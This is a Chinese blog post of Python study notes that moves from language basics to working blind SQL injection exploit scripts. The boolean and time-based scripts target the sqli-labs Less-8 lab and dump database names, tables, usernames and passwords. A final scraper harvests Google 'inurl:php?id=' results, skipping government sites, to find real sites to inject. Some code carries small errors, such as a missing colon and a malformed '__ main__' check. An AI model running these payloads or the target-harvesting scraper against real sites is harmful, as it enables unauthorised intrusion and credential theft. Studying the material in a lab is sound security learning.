Python基础

1、基础

jiaGe = 5;  // 定义价格
zhongLiang = 6;  // 定义重量
# .format()代入价格、重量，输出jiaGe和zhongLiang
print("苹果的价格：{}元/斤，重量：{}斤".format(jiaGe,zhongLiang));

# 输出
# 苹果的价格：5元/斤，重量：6斤

# sep=""间隔符；end=""不换行输出print（Python3.x版本默认print换行输出）
print(1,2,3,sep=":",end="---Next---");
print(1,2,3,sep="-",end="...");

# 输出
# 1:2:3---Next---1-2-3...

jiaGe = input();  # input()输入的是字符串
zhongLiang = 6;
print("苹果的价格：{}元/斤，重量：{}斤".format(jiaGe,zhongLiang));
print("总价格是{}元".format(jiaGe*zhongLiang));

# 5
# 苹果的价格：5元/斤，重量：6斤
# 总价格是555555元

jiaGe = int(input());  # 使用int()强转类型
zhongLiang = 6;
print("苹果的价格：{}元/斤，重量：{}斤".format(jiaGe,zhongLiang));
print("总价格是{}元".format(jiaGe*zhongLiang));

# 5
# 苹果的价格：5元/斤，重量：6斤
# 总价格是30元

# 输入苹果单价、重量，购买优惠十元，输出总价
jiaGe = int(input("苹果的价格：元/斤"));
zhongLiang = int(input("苹果的重量：斤"));
zongJia = jiaGe*zhongLiang;
zongJia = zongJia -10;
print("苹果的价格：{}元/斤，重量：{}斤".format(jiaGe,zhongLiang));
print("总价格：{}元".format(zongJia));

# 苹果的价格：元/斤5
# 苹果的重量：斤6
# 苹果的价格：5元/斤，重量：6斤
# 总价格：20元

2、数据类型

2.1 内置函数

# int（去小数部分）
num = 3.14
print(int(num))  # 输出3
# round（四舍五入取小数）
# abs（取绝对值）
# pow（取平方）
# hex（十进制转16进制）
# oct（十进制转八进制）
# ord（根据ASCII表，字符转十进制）
# chr（根据ASCII表，十进制转字符）

2.2 字符串切片

# 转义字符
print("Python中的单引号'和双引号\"使用转义字符正常输出")

# 字符串[开始索引:结束索引:步长]
str = 'abcdefghijklmnopqrstuvwxyz'
print(str[0:10:2])  # 输出acegi

# 从左往右数，从0开始
str = 'abcdefghijklmnopqrstuvwxyz'
print(str[0])  # 输出a
# 从右往左数，从-1开始
str = 'abcdefghijklmnopqrstuvwxyz'
print(str[-1])  # 输出z

# 输出连续字符串（包括左边不包括右边）
str = 'abcdefghijklmnopqrstuvwxyz'
# 取前三位
print(str[0:3])  # 输出abc
# 取后三位
print(str[-3:])  # 输出xyz

# 拼接字符串
str = 'abcdefghijklmnopqrstuvwxyz'
print(str[0:3]+str[-3:])  # 输出abcxyz

2.3 字符串常用操作

判断类型

is方法开头大都是做判断类型，返回布尔值

# string.isspace() --> 如果string中只包含空格，返回True
str1 = ''
print(str1.isspace())  # False
str2 = ' '
print(str2.isspace())  # True

查找替换

# string.find()

# str2存在str1中返回开始索引，不存在返回-1
str1 = 'abcdefghijklmnopqrstuvwxyz'
str2 = 'abc'
print(str1.find(str2,0,len(str1)))  # 输出0（从第0个开始）

str1 = 'abcdefghijklmnopqrstuvwxyz'
str2 = 'abcxyz'
print(str1.find(str2,0,len(str1)))  # 输出-1（不存在）

# string.replace()
# a替换成A，替换一次
str = 'abcadefghijklmnopqrstuvwxyz'
print(str.replace('a','A',1))  # 输出Abcadefghijklmnopqrstuvwxyz

# a替换成A，替换所有
str = 'abcadefghijklmnopqrstuvwxyz'
print(str.replace('a','A',))  # 输出AbcAdefghijklmnopqrstuvwxyz

大小写转换

# str.upper()
str = 'abcadefghijklmnopqrstuvwxyz'
print(str.upper())  # 输出ABCADEFGHIJKLMNOPQRSTUVWXYZ

去除空白字符

# str.strip()

# 去除首位空白字符
str = ' abcadefghijklmnopqrstuvwxyz '
print(str.strip())  #输出abcadefghijklmnopqrstuvwxyz

# 首尾去除指定字符
str = '.abcadefghijklmnopqrstuvwxyz.'
print(str.strip('.'))  # 输出abcadefghijklmnopqrstuvwxyz

2.4 列表

跟字符串类似

list = [1,'abc',[2,'xyz']]
print(list[:])  # 输出[1, 'abc', [2, 'xyz']]

增

# list.insert()

# 列表索引1前面插入'xyz'
list = [1,'abc',[2,'xyz']]
list.insert(1,'xyz')
print(list)  #输出[1, 'xyz', 'abc', [2, 'xyz']]

# 列表末尾插入3
list = [1,'abc',[2,'xyz']]
list.insert(3,3)
print(list)  # 输出[1, 'abc', [2, 'xyz'], 3]
# 或者使用list.append()函数
list = [1,'abc',[2,'xyz']]
list.append(3)
print(list)  # 输出[1, 'abc', [2, 'xyz'], 3]

删

# list.remove()函数中写元素
list = [1,'abc',[2,'xyz']]
list.remove('abc')
print(list)  # 输出[1, [2, 'xyz']]

改

# 第三个改为3x
list = [1,'abc',[2,'xyz']]
list[2] = "3x"
print(list)  # 输出[1, 'abc', '3x']

查

# 查看第二个字符串第一个元素
list = [1,'abc',[2,'xyz']]
print(list[1][0])  # 输出a

统计

# 统计出现次数，只有list[0]被统计
list = [1,'1',[1,'1']]
print(list.count(1))  # 输出1

排序

# list.sort()函数
# 类型不同报错

2.5 元组

元组与列表相似，但是元组不能修改，列表可以修改

# list函数元组转列表
list(元组)

# tuple函数列表转元组
tuple(列表)

2.6 集合

用大括号或者set()函数创建集合

集合基本功能：进行成员关系测试和删除重复元素

注：创建空集合必须要用set()函数，因为{}用于创建字典

2.7 字典

列表是有序对象集合，字典是无序对象集合

用{}定义，键值对使用,分隔

键key是索引，值value是数据，键和值之间用:连接

字典是键值对存放，键名是唯一的，且只能是字符串、数字或元组，键值可以相同，可取任意数据类型

dict = {'name':'Tom','id':1}
print(dict['name'])  # 输出Tom

2.8 运算符

面向百度的编程语言

2.9 比较运算符

# =是赋值
# ==是判断是否等于

a += b  # a = a + b

# 海象运算符（3.8新增的赋值运算）

2.10 位运算符

&  # 按位与运算符
|  # 按位或运算符
^  # 按位异或运算符
~  # 按位取反运算符
<<  # 左移动运算符
>>  # 右移动运算符

2.11 逻辑运算符

and
or
not

2.12 成员运算符

in
not in

2.13 身份运算符

is
is not

2.14 运算符优先级

加括号就完事

3、条件控制与循环

3.1 if语句

每个条件后面使用冒号，后面是满足条件执行的语句块

使用缩进划分语句块，相同缩进的语句组成一个语句块

score = int(input("分数"))
if (score >= 90):
    print("优秀")
elif (90 > score >= 80):
    print("良好")
elif(score < 80):
    print("垃圾")
else:
    print("弟弟")

3.2 if嵌套

嵌套时注意缩进

# 案例：石头剪刀布
import random  # 引入库

player = int(input("请输入石头(1)/剪刀(2)/布(3)"))
computer = random.randint(1,3)  # 使用1-3随机数

if (player == 1 and computer == 2) or (player == 2 and computer == 3) or (player == 3 and computer == 1):
    print("You Win")
elif (player == computer):
    print("Draw")
else:
    print("Computer Win");

# 通过编写函数实现

import random

def Game(player,computer):  # def 定义函数的关键字（必须要有）  Game 函数名称  player computer 参数（需要赋值）
    result = ""  # result 返回值
    if (player == 1 and computer == 2) or (player == 2 and computer == 3) or (player == 3 and computer == 1):
        result = "You Win"
    elif (player == computer):
        result = "Draw"
    else:
        result = "Computer Win"
    return result

if __name__ == "__main__":
    player = int(input("请输入石头(1)/剪刀(2)/布(3)："))
    computer = random.randint(1, 3)
    print(Game(player,computer))

3.3 for循环

遍历迭代对象（一个列表或者一个字符串）

# 遍历字符串
str = "wobuxiangshangban"
for sname in str:
    print(sname)

# for可与else使用
for i in range(0,10):
    print(i)
else:
    print("end")

# 案例：for循环遍历列表

# 创建水果列表并输出列表中的所有元素
fruits = ['apple','pear','grape','orange','pieapple']
for fruit in fruits:
    print("水果有：{}".format(fruit))


# 创建数字列表（方法一）
nums = []
for i in range(1,6):
    nums.append(i)
print(nums)

# 创建数字列表（方法二）
nums = [i for i in range(1,6)]  # 列表推导式
print(nums)


# 同时输出两个列表元素（方法一）
fruits = ['apple','pear','grape','orange','pieapple']
nums = [i for i in range(1,6)]
for i in range(0,len(fruits)):
    print("第{}个水果是{}".format(nums[i],fruits[i]))

# 同时输出两个列表元素（方法二）
fruits = ['apple','pear','grape','orange','pieapple']
nums = [i for i in range(1,6)]
# 双重循环
for num,fruit in zip(nums,fruits):  # zip函数
    print("第{}个水果是{}".format(num,fruit))

3.4 while循环

i = 0
while i < 10:
    print(i)
    i += 1

3.5 break语句

i = 0
while True:
    i += 1
    print(i)
    if (i == 10):
        break

3.6 continue语句

i = 0
while True:
    i += 1
    if (i == 10):
        break
    elif (i % 3 == 0):
        continue
    else
        print(i,end='\t')

# pass不做任何事情，一般用做占位语句
while True:
    i += 1
    if (i == 10):
        break
    elif (i % 3 == 0):
        pass
    else:
        print(i,end='\t')

3.7 使用循环创建文件

# 案例：创建文本文档并使用数字命名
for i in range(1,11):
    file = open("C:/test/{}.txt".format(i),"w")
    file.write("xiaBan")  # 写入内容
    file.close()  # 关闭文件

# 读写模式
r：读取文件，若文件不存在则会报错
w：写入文件，若文件不存在则会先创建再写入，会覆盖原文件
a：写入文件，若文件不存在则会先创建再写入，但不会覆盖原文件，而是追加在文件末尾
rb,wb：分别与r,w类似，但是用于读写二进制文件
r+：可读、可写，文件不存在也会报错，写操作时会覆盖
w+：可读，可写，文件不存在先创建，会覆盖
a+：可读、可写，文件不存在先创建，不会覆盖，追加在末尾

3.8 打印九九乘法表

# 方法一（for正序）
for i in range(1,10):
    print()
    for j in range(1,10):
        if(j > i):
            break
        print("{}*{}={}".format(i,j,i*j),end="\t")

# 方法二（for倒序）
for i in range(1,10):
    print()
    for j in range(1,10):
        if(j < i):
            print(" ",end="\t\t")
            continue
        print("{}*{}={}".format(i,j,i*j),end="\t")

# 方法三（while正序）
i = 0
while i < 9:
    i += 1
    print()
    j = 0
    while j < 9:
        j += 1
        if(i < j):
            break
        print("{}*{}={}".format(i, j, i * j), end="\t")

# 方法四（while倒序）
i = 0
while i < 9:
    i += 1
    print()
    j = 0
    while j < 9:
        j += 1
        if(i > j):
            print(" ", end="\t\t")
            continue
        print("{}*{}={}".format(i, j, i * j), end="\t")

# 九九乘法表写入文件
for i in range(1,10):
    for j in range(1,10):
        if(j > i):
            break
        file = open("C:/test/1.txt","a+")
        file.write("{}*{}={}\t".format(i,j,i*j))
    file.write("\n")
file.close()
print("成功写入")

4、Python盲注EXP编写

SQL语句注释补充【sql注入中23%代表什么（#）】
1.url中#和-- （有个空格）表示注释，可以使它们后面的语句不被执行。
在url中，get请求（浏览器中输入的url）解释执行的时候，url中#号是用来指导浏览器动作的，对服务器端无用。所以，HTTP请求中不包括#，因此使用#闭合无法注释，会报错；而使用-- （有个空格），在传输过程中空格会被忽略，同样导致无法注释，所以在get请求传参注入时才会使用--+的方式来闭合（+会被解释成空格）。
2.使用--%20
把空格转换为urlencode编码格式不会报错。同理把#变成%23也不报错。
3.post请求
可以直接使用#来进行闭合。常见的就是表单注入，比如在后台登录框中进行注入。
4.为什么--后面必须要有空格，而#后面就不需要
使用--注释时，需要使用空格，才能形成有效的sql语句，而#后面可以有空格，也可以没有，sql就是这么规定的
不加空格，--直接和系统自动生成的单引号连接在了一起，会被认为是一个关键词，无法注释掉系统自动生成的单引号。

4.1 通过Python向浏览器发送报文请求数据

# 通过requests库模拟请求报文

# 原生库：import urllib
# 更好用的库：import requests

import requests

url = 'http://127.0.0.1/sqliLabs/Less-8/'

# get方式
headers = {
    # 字典形式（键值对）
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36'
}
req = requests.get(url=url,headers=headers)

# print(type(req))  # <class 'requests.models.Response'>

# print(req.headers)  # Respones Headers

# print(req.status_code)  # 状态码

# print(req.url)  # 请求地址链接

# 常用text查看网站响应信息
# print(req.text)  # 网站响应包，Python自动做了处理
# print(req.content)  # bytes格式网站响应包，未处理原信息


# # post方式
# data = {}
# requests.post()

4.2 布尔盲注EXP

1）盲注函数：
length()  # 返回字符串的长度
substr()  # 截取字符串，语法substr(str,start,len)，例如substr('abc',1,1)截取a
ascii()  # 返回字符的ascii码，将字符变为数字
sleep()  # 将程序延时一段时间，如果使用网站的访问量过大，且全都延时100秒，数据库的资源被大量占用，服务器会崩溃
if(expr1,expr2,expr3)  # 判断语句，如果第一个语句正确就执行第二个语句，否则执行第三个语句


2）注入语句：
# 拆解当前数据库名称长度
http://x.com/index.php?id=1 and length(database())>1

# 利用ASCII码猜解当前数据库名称
http://x.com/index.php?id=1 and ascii(substr(database(),1,1))>1
# 最好将ascii用括号变为一个整体
http://x.com/index.php?id=1 and (ascii(substr(database(),1,1)))>1

# 猜解表名，子查询建议加括号
http://x.com/index.php?id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>1

# 猜解字段名
http://x.com/index.php?id=1 and (ascii(substr((select column_name from information_schema.columns where table_name='admin' and table_schema=database() limit 0,1),1,1)))>1

# 猜解内容
http://x.com/index.php?id=1 and (ascii(substr((select apple1 from admin limit 0,1),1,1)))>1

# 跑库的长度
import requests

url = 'http://127.0.0.1/sqliLabs/Less-8/?id=1'
payload = "' and length(database())={} %23"
exp = url + payload
# headers模拟发包信息，打靶可有可无
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36'
}

i = 0
while True:
    req = requests.get(url=exp.format(i),headers=headers)
    if "You are in..........." in req.text:
        print("库的长度：{}".format(i))
        break
    i += 1

# 优化后（二分法）
import requests

def length_two(exp):
    min = 0
    max = 128
    while True:
        if (max-min) > 1:
            mid = int((min+max)/2)
        else:
            mid = max
            return mid
        req = requests.get(url=exp.format(mid),headers=headers)
        if "You are in..........." in req.text:
            min = mid
        else:
            max = mid

if __name__ == '__main__':
    url = 'http://127.0.0.1/sqliLabs/Less-8/?id=1'
    payload = "' and length(database())>{} %23"
    exp = url + payload
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36'
    }
    print(length_two(exp))

# 跑库的名字
import requests

url = 'http://127.0.0.1/sqliLabs/Less-8/?id=1'
payload = "' and ascii(substr(database(),{},1))={} %23"
exp = url + payload
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36'
}
db_name = ''
for j in range(1,9):
    for i in range(0,128):
        req = requests.get(url=exp.format(j,i),headers=headers)
        if "You are in..........." in req.text:
            db_name += chr(i)
            break
print("库名：{}".format(db_name))

# 优化后（二分法）
import requests

def name_two(length,exp):
    name = ''
    try:
        for i in range(1,length+1):
            min = 0
            max = 128
            while True:
                if(max - min > 1):
                    mid = int((min+max)/2)
                else:
                    mid = max
                    name += chr(mid)
                    print(name)
                    break
                html = requests.get(exp.format(i,mid))
                if "You are in..........." in html.text:
                    min = mid
                else:
                    max = mid
    except Exception as e:
        print(e)
if __name__ == '__ main__':
    url = 'http://127.0.0.1/sqliLabs/Less-8/?id=1'
    payload = "' and ascii(substr(database(),{},1))={} %23"
    exp = url + payload
    name_two(8,exp)

# 二分法综合EXP跑库长和库名
import requests

def length_two(exp):
    min = 0
    max = 128
    while True:
        if ((max-min) > 1):
            mid = int((min+max)/2)
        else:
            mid = max
            return mid
        req = requests.get(url=exp.format(mid),headers=headers)
        if "You are in..........." in req.text:
            min = mid
        else:
            max = mid

def name_two(length,exp):
    name = ''
    try:
        for i in range(1,length+1):
            min = 0
            max = 128
            while True:
                if (max - min >1):
                    mid = int((min+max)/2)
                else:
                    mid = max
                    name += chr(mid)
                    print(name)
                    break
                req = requests.get(url=exp.format(i,mid),headers=headers)
                if "You are in..........." in req.text:
                    min = mid
                else:
                    max = mid
    except Exception as e:
        print(e)
if __name__ == '__main__':
    url = 'http://127.0.0.1/sqliLabs/Less-8/?id=1'
    payload = "' and ascii(substr(database(),{},1))>{} %23"
    exp = url + payload
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36'
    }
    name_two(8,exp)

Python盲注EXP：

# 布尔盲注EXP参考

import requests

# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = f"http://localhost:90/sqli-labs-master/Less-8/?id=1' and length(database())>{i}"
        r = requests.get(url + '%23')
        if 'You are in' not in r.text:
            print('database_length:', i)
            return i

#获取数据库名
def database_name(databaselen):
     name = ''
     for j in range(1, databaselen+1):
        for i in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz":
            url = "http://localhost:90/sqli-labs-master/Less-8/?id=1' and substr(database(),%d,1)='%s'" % (j, i)
            #print(url+'%23')
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
     print('database_name:', name)

# 获取数据库表
def tables_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://localhost:90/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(table_name) from information_schema.tables " \
                  "where table_schema=database()),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('table_name:', name)

# 获取表中字段
def columns_name():
    name = ''
    for j in range(1, 30):
        for i in 'abcdefghijklmnopqrstuvwxyz,':
            url = "http://localhost:90/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(column_name) from information_schema.columns where " \
                  "table_schema=database() and table_name='users'),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('column_name:', name)

# 获取username
def username_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://localhost:90/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(username) from users),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('username_value:', name)

# 获取password
def password_value():
    name = ''
    for j in range(1, 100):
        for i in '0123456789abcdefghijklmnopqrstuvwxyz,_-':
            url = "http://localhost:90/sqli-labs-master/Less-8/?id=1' " \
                  "and substr((select group_concat(password) from users),%d,1)='%s'" % (j, i)
            r = requests.get(url + '%23')
            if 'You are in' in r.text:
                name = name + i
                break
    print('password_value:', name)

if __name__ == '__main__':
    dblen = database_len()
    database_name(dblen)
    tables_name()
    columns_name()
    username_value()
    password_value()

4.3 时间盲注EXP

1）盲注函数
length()        返回字符串的长度
ascii()         返回一个字符的ascii码值
mid()           取出字符串中的一部分值
substr()        截取字符串
hex()           返回16进制数

sleep()         时间注入的核心函数
sleep(1)        过1s相应

if()            if判断函数
if(1=1,3,4)     返回3
if(1=2,3,4)     返回4


2）构建判断语句
id=1' and if(1=2,1,sleep(10)) --+
id=1" and if(1=2,1,sleep(10)) --+
id=1) and if(1=2,1,sleep(10)) --+


3）构建暴库语句
id=1' and if(length(database())>1,sleep(2),0) --+
增加1值来猜库名的长度
id=1' and if(ascii(substr(database(),1,1))>114,sleep(2),0) --+
增加1值，对照ascii表查询库名
id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101,sleep(1),0)--+
增加1值，对照ascii表查询表名
id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),1,1))>104,sleep(1),0)--+
增加1值，对照ascii表查询列名
id=1' and if(ascii(substr((select id from emails limit 0,1),1,1))>49,sleep(1),0)--+
根据表名和列名进行暴值

# 时间盲注二分法EXP跑库长和库名
import requests
import time

def length_two(exp):
    min = 0
    max = 128
    while True:
        if(max - min >1):
            mid = int((min+max)/2)
        else:
            mid = max
            print("库长：{}".format(mid))
            break
        start_time = time.time()
        html = requests.get(exp.format(mid))
        if(time.time() - start_time > 2):
            min = mid
        else:
            max = mid

def name_two(length,exp):
    name = ''
    try:
        for i in range(1,length+1):
            min = 0
            max = 128
            while True:
                if(max - min > 1):
                    mid = int((min+max)/2)
                else:
                    mid = max
                    name += chr(mid)
                    print(name)
                    break
                start_time = time.time()
                html = requests.get(exp.format(i,mid))
                if(time.time() - start_time > 2):
                    min = mid
                else:
                    max = mid
    except Exception as e:
        print(e)

if __name__ == '__main__':
    url = 'http://127.0.0.1/sqliLabs/Less-8/?id=1'
    payload = "' and if(ascii(substr(database(),{},1))>{},sleep(2),1) %23"
    exp = url + payload
    name_two(8, exp)

5、Python爬取注入站点脚本编写

XPath补充：

表达式	描述
nodename	选取此节点的所有子节点
/	从根节点选取
//	从匹配选择的当前节点选择文档中的节点，而不考虑它们的位置
@	选取属性

XPath语法参考链接：https://www.w3school.com.cn/xpath/xpath_syntax.asp

# 网络请求
import requests

url = "https://www.cnblogs.com/HKalpa/"

html = requests.get(url).text

print(html)

# 单页面爬取URL

import requests
from lxml import etree  # 处理xpath格式

# 网络请求
url = "https://www.cnblogs.com/programmerwang/default.html"
html = requests.get(url).text

# 数据处理 xpath ba4 re（正则）
# xpath
tree = etree.HTML(html)
# //a[@class="c_b_p_desc_readmore"]/@href
pages = tree.xpath("//a[@class=\"c_b_p_desc_readmore\"]/@href")
for page in pages:
    print(page)

# 多页面爬取URL

import requests
from lxml import etree  # 处理xpath格式

for i in range(1,10):
    # 网络请求
    url = "https://www.cnblogs.com/programmerwang/default.html?page={}".format(i)
    html = requests.get(url).text

    # xpath数据处理
    tree = etree.HTML(html)
    pages = tree.xpath("//a[@class=\"c_b_p_desc_readmore\"]/@href")
    for page in pages:
        print(page)

# 爬取谷歌URL（半自动）
import requests
from lxml import etree  # 处理xpath格式

# 网络请求
url = "https://www.google.com/search?q=inurl%3A+php%3Fid%3D&sxsrf=ALiCzsa6HEJIHMwd42Jc0VRVNkzxb-HlAw%3A1663505949925&ei=HRYnY5GJOK-fptQPjaiLyAs&ved=0ahUKEwjRi-jJsp76AhWvj4kEHQ3UArkQ4dUDCA4&oq=inurl%3A+php%3Fid%3D&gs_lcp=Cgdnd3Mtd2l6EAxKBAhBGABKBAhGGABQAFgAYABoAHABeACAAQCIAQCSAQCYAQA&sclient=gws-wiz"

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'
}

html = requests.get(url=url,headers=headers).text

# xpath数据处理
tree = etree.HTML(html)
pages = tree.xpath("//a[@data-ved]/@href")
for page in pages:
    if '#' in page:
        continue
    elif 'gov' in page:
        continue
    print(page)

posted @ 2022-09-28 18:14 HKalpa 阅读(225) 评论(0) 编辑收藏举报

刷新页面返回顶部

Kalpa

即使再小的帆也能远航